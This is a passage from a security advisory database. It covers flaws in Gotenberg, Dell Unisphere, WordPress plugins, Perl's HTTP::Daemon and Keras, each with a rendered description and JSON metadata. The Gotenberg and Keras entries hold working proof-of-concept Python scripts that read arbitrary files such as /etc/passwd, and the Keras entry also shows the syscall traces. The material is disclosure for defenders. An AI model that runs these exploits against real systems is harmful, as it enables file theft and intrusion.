/Type /Catalog /Pages 2 0 R \u003e\u003e\\nendobj\\n\"\n b\"2 0 obj\\n\u003c\u003c /Type /Pages /Kids [3 0 R] /Count 1 \u003e\u003e\\nendobj\\n\"\n b\"3 0 obj\\n\u003c\u003c /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] \u003e\u003e\\nendobj\\n\"\n b\"xref\\n0 4\\n0000000000 65535 f \\n0000000009 00000 n \\n\"\n b\"0000000058 00000 n \\n0000000115 00000 n \\n\"\n b\"trailer\\n\u003c\u003c /Size 4 /Root 1 0 R \u003e\u003e\\nstartxref\\n180\\n%%EOF\\n\")\n\nr = requests.post(\n f\"{T}/forms/pdfengines/merge\",\n files={\"file1\": (\"a.pdf\", io.BytesIO(minimal), \"application/pdf\"),\n \"file2\": (\"b.pdf\", io.BytesIO(minimal), \"application/pdf\")},\n data={\"stampSource\": \"pdf\", \"stampExpression\": \"/tmp/victim_doc.pdf\"},\n timeout=30,\n)\nprint(f\"HTTP {r.status_code} bytes={len(r.content)}\")\nopen(\"/tmp/out.pdf\", \"wb\").write(r.content)\nprint(subprocess.run([\"pdftotext\", \"/tmp/out.pdf\", \"-\"],\n capture_output=True, text=True).stdout)\n```\n\nObserved output against gotenberg 8.31.0:\n\n```\nHTTP 200 bytes=1852\nBOB-CONFIDENTIAL-CONTRACT-2026-04-20\n...\n```\n\nNon-PDF targets via `stampSource=pdf` (for example `/etc/hostname`) return HTTP 500 after pdfcpu fails to parse the file as PDF, which acts as a file-existence oracle. `stampSource=image` with non-image files returns HTTP 400 (image parsing rejects it). The same PoC applies with `stampSource` replaced by `watermarkSource` and `stampExpression` by `watermarkExpression`.\n\n## Impact\n\nAny anonymous caller with access to port 3000 reads PDF files from any path the Gotenberg process can open. In the default Docker image with no volume mounts, the reachable set is limited to `/tmp/\u003cgotenberg-work-uuid\u003e/\u003crequest-uuid\u003e/*.pdf` (files staged during another in-flight request) and any PDF files the base image happens to ship. In deployments that bind-mount host directories into the container (document processing pipelines, shared storage for Office document conversion), the attacker reads arbitrary PDF files under those mount points. The file-existence oracle additionally lets the attacker probe for the presence of non-PDF files anywhere the process can read.\n\n## Recommended Fix\n\nApply the dedicated stamp route\u0027s guard to all six stamp call sites and all six watermark call sites:\n\n```go\nif stamp.Source == gotenberg.StampSourceImage || stamp.Source == gotenberg.StampSourcePDF {\n if stampFile == \"\" {\n return api.WrapError(\n errors.New(\"no stamp file provided for image or pdf source\"),\n api.NewSentinelHttpError(http.StatusBadRequest,\n \"Invalid form data: a stamp file is required for image or pdf source\"),\n )\n }\n stamp.Expression = stampFile\n}\nif watermark.Source == gotenberg.StampSourceImage || watermark.Source == gotenberg.StampSourcePDF {\n if watermarkFile == \"\" {\n return api.WrapError(\n errors.New(\"no watermark file provided for image or pdf source\"),\n api.NewSentinelHttpError(http.StatusBadRequest,\n \"Invalid form data: a watermark file is required for image or pdf source\"),\n )\n }\n watermark.Expression = watermarkFile\n}\n```\n\nCall sites: `pkg/modules/pdfengines/routes.go:679-683` (merge), `:803-807` (split), `pkg/modules/libreoffice/routes.go:307-311`, `pkg/modules/chromium/routes.go:433-438` (url), `:508-513` (html), `:592-597` (markdown), plus each route\u0027s watermark counterpart.\n\n---\n*Found by [aisafe.io](https://aisafe.io)*",
"id": "GHSA-3cv5-q585-h563",
"modified": "2026-05-14T20:52:32Z",
"published": "2026-05-07T00:59:50Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-3cv5-q585-h563"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42593"
},
{
"type": "PACKAGE",
"url": "https://github.com/gotenberg/gotenberg"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Gotenberg has arbitrary PDF read via stampExpression and watermarkExpression in merge, split, and convert routes"
}
GHSA-3G9H-GC4R-R2PP
Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-19 18:31Dell Unisphere for PowerMax, version(s) 10.2, contain(s) an External Control of File Name or Path vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.
{
"affected": [],
"aliases": [
"CVE-2026-26361"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-19T09:16:25Z",
"severity": "MODERATE"
},
"details": "Dell Unisphere for PowerMax, version(s) 10.2, contain(s) an External Control of File Name or Path vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.",
"id": "GHSA-3g9h-gc4r-r2pp",
"modified": "2026-02-19T18:31:53Z",
"published": "2026-02-19T18:31:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26361"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-us/000429268/dsa-2026-102-dell-unisphere-for-powermax-and-powermax-eem-security-update-for-multiple-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3H64-FX5V-2F3Q
Vulnerability from github – Published: 2025-12-12 06:31 – Updated: 2026-04-08 18:34The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP's filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the 'current_user_avatar' parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled.
{
"affected": [],
"aliases": [
"CVE-2025-13320"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-12T04:15:41Z",
"severity": "MODERATE"
},
"details": "The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP\u0027s filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the \u0027current_user_avatar\u0027 parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled.",
"id": "GHSA-3h64-fx5v-2f3q",
"modified": "2026-04-08T18:34:00Z",
"published": "2025-12-12T06:31:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13320"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L70"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L75"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L86"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L70"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L75"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L86"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3420956/wp-user-manager/trunk/includes/forms/trait-wpum-account.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8304bf-bec2-4fcf-9fe2-46b626b3dae9?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3HC6-3P33-WQ57
Vulnerability from github – Published: 2026-05-27 06:31 – Updated: 2026-07-07 12:31HTTP::Daemon versions before 6.17 for Perl allow OS command injection via send_file().
send_file() opens its string argument with Perl's 2-arg open(). The 2-arg form interprets magic prefixes: '| cmd' and 'cmd |' open a pipe to a subprocess, '> path' and '>> path' open the path for write or append.
Untrusted input passed to send_file() can run OS commands at the daemon process UID. The read-pipe form ('cmd |') also leaks subprocess stdout into the HTTP response body. The write-mode forms can create or truncate files at attacker chosen paths.
{
"affected": [],
"aliases": [
"CVE-2026-8450"
],
"database_specific": {
"cwe_ids": [
"CWE-73",
"CWE-78"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-27T05:16:23Z",
"severity": "CRITICAL"
},
"details": "HTTP::Daemon versions before 6.17 for Perl allow OS command injection via send_file().\n\nsend_file() opens its string argument with Perl\u0027s 2-arg open(). The 2-arg form interprets magic prefixes: \u0027| cmd\u0027 and \u0027cmd |\u0027 open a pipe to a subprocess, \u0027\u003e path\u0027 and \u0027\u003e\u003e path\u0027 open the path for write or append.\n\nUntrusted input passed to send_file() can run OS commands at the daemon process UID. The read-pipe form (\u0027cmd |\u0027) also leaks subprocess stdout into the HTTP response body. The write-mode forms can create or truncate files at attacker chosen paths.",
"id": "GHSA-3hc6-3p33-wq57",
"modified": "2026-07-07T12:31:29Z",
"published": "2026-05-27T06:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8450"
},
{
"type": "WEB",
"url": "https://github.com/libwww-perl/HTTP-Daemon/pull/89"
},
{
"type": "WEB",
"url": "https://github.com/libwww-perl/HTTP-Daemon/commit/945d35141d94490f749640bd4390acd6a2193995.patch"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:36187"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:36188"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2026:36189"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-8450"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2481773"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2026/06/msg00028.html"
},
{
"type": "WEB",
"url": "https://metacpan.org/release/OALDERS/HTTP-Daemon-6.17/changes"
},
{
"type": "WEB",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8450.json"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/05/27/5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3HHQ-XM5H-WCVH
Vulnerability from github – Published: 2022-09-07 00:01 – Updated: 2025-03-21 18:31The Download Manager plugin for WordPress is vulnerable to arbitrary file deletion in versions up to, and including 3.2.50. This is due to insufficient file type and path validation on the deleteFiles() function found in the ~/Admin/Menu/Packages.php file that triggers upon download post deletion. This makes it possible for contributor level users and above to supply an arbitrary file path via the 'file[files]' parameter when creating a download post and once the user deletes the post the supplied arbitrary file will be deleted. This can be used by attackers to delete the /wp-config.php file which will reset the installation and make it possible for an attacker to achieve remote code execution on the server.
{
"affected": [],
"aliases": [
"CVE-2022-2431"
],
"database_specific": {
"cwe_ids": [
"CWE-610",
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-09-06T18:15:00Z",
"severity": "HIGH"
},
"details": "The Download Manager plugin for WordPress is vulnerable to arbitrary file deletion in versions up to, and including 3.2.50. This is due to insufficient file type and path validation on the deleteFiles() function found in the ~/Admin/Menu/Packages.php file that triggers upon download post deletion. This makes it possible for contributor level users and above to supply an arbitrary file path via the \u0027file[files]\u0027 parameter when creating a download post and once the user deletes the post the supplied arbitrary file will be deleted. This can be used by attackers to delete the /wp-config.php file which will reset the installation and make it possible for an attacker to achieve remote code execution on the server.",
"id": "GHSA-3hhq-xm5h-wcvh",
"modified": "2025-03-21T18:31:19Z",
"published": "2022-09-07T00:01:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2431"
},
{
"type": "WEB",
"url": "https://packetstormsecurity.com/files/167920/wpdownloadmanager3250-filedelete.txt"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=2762092%40download-manager\u0026new=2762092%40download-manager\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/blog/2022/08/high-severity-vulnerability-patched-in-download-manager-plugin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3M4Q-JMJ6-R34Q
Vulnerability from github – Published: 2026-02-18 22:41 – Updated: 2026-02-18 22:41Summary
TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).
Impact
- Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
- What leaks: Contents of any readable file on the host (e.g.,
/etc/hosts,/etc/passwd,/etc/hostname). - Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
- Prerequisites: Victim executes
model.load_weights()ortf.keras.models.load_model()on an attacker-supplied HDF5 weights file or.kerasarchive. - Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.
Attacker Scenario
- Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
- Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g.,
/home/<user>/.ssh/id_rsa,/etc/shadowif readable, configuration files containing API keys, etc.). - Execution: The victim calls
model.load_weights()(ortf.keras.models.load_model()for.kerasarchives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors. - Exfiltration vectors:
- Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
- Re-saving the model (weights or
.kerasarchive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry. - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.
Additional Preconditions
- The target file must exist and be readable by the process running TensorFlow/Keras.
- Safe mode (
load_model(..., safe_mode=True)) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization. - Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to
/etc/hostname) can reduce impact, but common defaults expose a broad set of host files.
Environment Used for Verification (2025‑10‑19)
- OS: Debian-based container running Python 3.11.
- Packages (installed via
python -m pip install -U ...): tensorflow==2.20.0keras==3.11.3h5py==3.15.1numpy==2.3.4- Tooling:
strace(for syscall tracing),pipupgraded to latest before installs. - Debug flags:
PYTHONFAULTHANDLER=1,TF_CPP_MIN_LOG_LEVEL=0during instrumentation to capture verbose logs if needed.
Reproduction Instructions (Weights-Only PoC)
- Ensure the environment above (or equivalent) is prepared.
- Save the following script as
weights_external_demo.py:
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py
def choose_host_file() -> Path:
candidates = [
os.environ.get("KFLI_PATH"),
"/etc/machine-id",
"/etc/hostname",
"/proc/sys/kernel/hostname",
"/etc/passwd",
]
for candidate in candidates:
if not candidate:
continue
path = Path(candidate)
if path.exists() and path.is_file():
return path
raise FileNotFoundError("set KFLI_PATH to a readable file")
def build_model(units: int) -> tf.keras.Model:
model = tf.keras.Sequential([
tf.keras.layers.Input(shape=(1,), name="input"),
tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
])
model(tf.zeros((1, 1))) # build weights
return model
def find_bias_dataset(h5file: h5py.File) -> str:
matches: list[str] = []
def visit(name: str, obj) -> None:
if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
matches.append(name)
h5file.visititems(visit)
if not matches:
raise RuntimeError("bias dataset not found")
return matches[0]
def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
with h5py.File(path, "r+") as h5file:
bias_path = find_bias_dataset(h5file)
parent = h5file[str(Path(bias_path).parent)]
dset_name = Path(bias_path).name
del parent[dset_name]
max_bytes = 128
size = host_file.stat().st_size
nbytes = min(size, max_bytes)
nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing
units = max(1, nbytes // 4)
parent.create_dataset(
dset_name,
shape=(units,),
dtype="float32",
external=[(host_file.as_posix(), 0, nbytes)],
)
return units, nbytes
def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
raw = np.ascontiguousarray(arr).view(np.uint8)
ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
hex_preview = raw[:64].tobytes().hex()
return ascii_preview, hex_preview
def main() -> None:
host_file = choose_host_file()
model = build_model(units=32)
weights_path = Path("weights_demo.h5")
model.save_weights(weights_path.as_posix())
units, nbytes = rewrite_bias_external(weights_path, host_file)
print("secret_text_source", host_file)
print("units", units, "bytes_mapped", nbytes)
model.load_weights(weights_path.as_posix())
output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
ascii_preview, hex_preview = floats_to_ascii(output)
print("recovered_ascii", ascii_preview)
print("recovered_hex64", hex_preview)
saved = Path("weights_demo_resaved.h5")
model.save_weights(saved.as_posix())
print("resaved_weights", saved.as_posix())
if __name__ == "__main__":
main()
- Execute
python weights_external_demo.py. - Observe:
secret_text_sourceprints the chosen host file path.recovered_ascii/recovered_hex64display the file contents recovered via model inference.- A re-saved weights file contains the leaked bytes inside the artifact.
Expanded Validation (Multiple Attack Scenarios)
The following test harness generalises the attack for multiple HDF5 constructs:
- Build a minimal feed-forward model and baseline weights.
- Create three malicious variants:
- External storage dataset: dataset references
/etc/hosts. - External link:
ExternalLinkpointing at/etc/passwd. - Indirect link: external storage referencing a helper HDF5 that, in turn, refers to
/etc/hostname. - Run each scenario under
strace -f -e trace=open,openat,readwhile callingmodel.load_weights(...). - Post-process traces and weight tensors to show the exact bytes loaded.
Relevant syscall excerpts captured during the run:
openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13
The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.
Recommended Product Fix
- Default-deny external datasets/links:
- Inspect creation property lists (
get_external_count) before materialising tensors. - Resolve
SoftLink/ExternalLinktargets and block if they leave the HDF5 file. - Provide an escape hatch:
- Offer an explicit
allow_external_data=Trueflag or environment variable for advanced users who truly rely on HDF5 external storage. - Documentation:
- Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
- Regression coverage:
- Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.
Workarounds
- Avoid loading untrusted HDF5 weight files.
- Pre-scan weight files using
h5pyto detect external datasets or links before invoking Keras loaders. - Prefer alternate formats (e.g., NumPy
.npz) that lack external reference capabilities when exchanging weights. - If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.
Timeline (UTC)
- 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
- 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented
safe_keras_hdf5.pyprototype guard.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.13.0"
},
{
"fixed": "3.13.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "keras"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.12.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-1669"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-73"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T22:41:58Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 \u201cexternal storage\u201d and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras \u201csafe mode\u201d only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact\u2014perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. **Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home/\u003cuser\u003e/.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025\u201110\u201119)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n - `tensorflow==2.20.0`\n - `keras==3.11.3`\n - `h5py==3.15.1`\n - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -\u003e Path:\n candidates = [\n os.environ.get(\"KFLI_PATH\"),\n \"/etc/machine-id\",\n \"/etc/hostname\",\n \"/proc/sys/kernel/hostname\",\n \"/etc/passwd\",\n ]\n for candidate in candidates:\n if not candidate:\n continue\n path = Path(candidate)\n if path.exists() and path.is_file():\n return path\n raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -\u003e tf.keras.Model:\n model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=(1,), name=\"input\"),\n tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n ])\n model(tf.zeros((1, 1))) # build weights\n return model\n\ndef find_bias_dataset(h5file: h5py.File) -\u003e str:\n matches: list[str] = []\n def visit(name: str, obj) -\u003e None:\n if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n matches.append(name)\n h5file.visititems(visit)\n if not matches:\n raise RuntimeError(\"bias dataset not found\")\n return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -\u003e tuple[int, int]:\n with h5py.File(path, \"r+\") as h5file:\n bias_path = find_bias_dataset(h5file)\n parent = h5file[str(Path(bias_path).parent)]\n dset_name = Path(bias_path).name\n del parent[dset_name]\n max_bytes = 128\n size = host_file.stat().st_size\n nbytes = min(size, max_bytes)\n nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing\n units = max(1, nbytes // 4)\n parent.create_dataset(\n dset_name,\n shape=(units,),\n dtype=\"float32\",\n external=[(host_file.as_posix(), 0, nbytes)],\n )\n return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -\u003e tuple[str, str]:\n raw = np.ascontiguousarray(arr).view(np.uint8)\n ascii_preview = bytes(b if 32 \u003c= b \u003c 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n hex_preview = raw[:64].tobytes().hex()\n return ascii_preview, hex_preview\n\ndef main() -\u003e None:\n host_file = choose_host_file()\n model = build_model(units=32)\n\n weights_path = Path(\"weights_demo.h5\")\n model.save_weights(weights_path.as_posix())\n\n units, nbytes = rewrite_bias_external(weights_path, host_file)\n print(\"secret_text_source\", host_file)\n print(\"units\", units, \"bytes_mapped\", nbytes)\n\n model.load_weights(weights_path.as_posix())\n output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n ascii_preview, hex_preview = floats_to_ascii(output)\n print(\"recovered_ascii\", ascii_preview)\n print(\"recovered_hex64\", hex_preview)\n\n saved = Path(\"weights_demo_resaved.h5\")\n model.save_weights(saved.as_posix())\n print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n - `secret_text_source` prints the chosen host file path.\n - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n 1. **External storage dataset**: dataset references `/etc/hosts`.\n 2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n 3. **Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n - Inspect creation property lists (`get_external_count`) before materialising tensors.\n - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. **Regression coverage**:\n - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025\u201110\u201118**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025\u201110\u201119**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.",
"id": "GHSA-3m4q-jmj6-r34q",
"modified": "2026-02-18T22:41:58Z",
"published": "2026-02-18T22:41:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669"
},
{
"type": "WEB",
"url": "https://github.com/keras-team/keras/pull/22057"
},
{
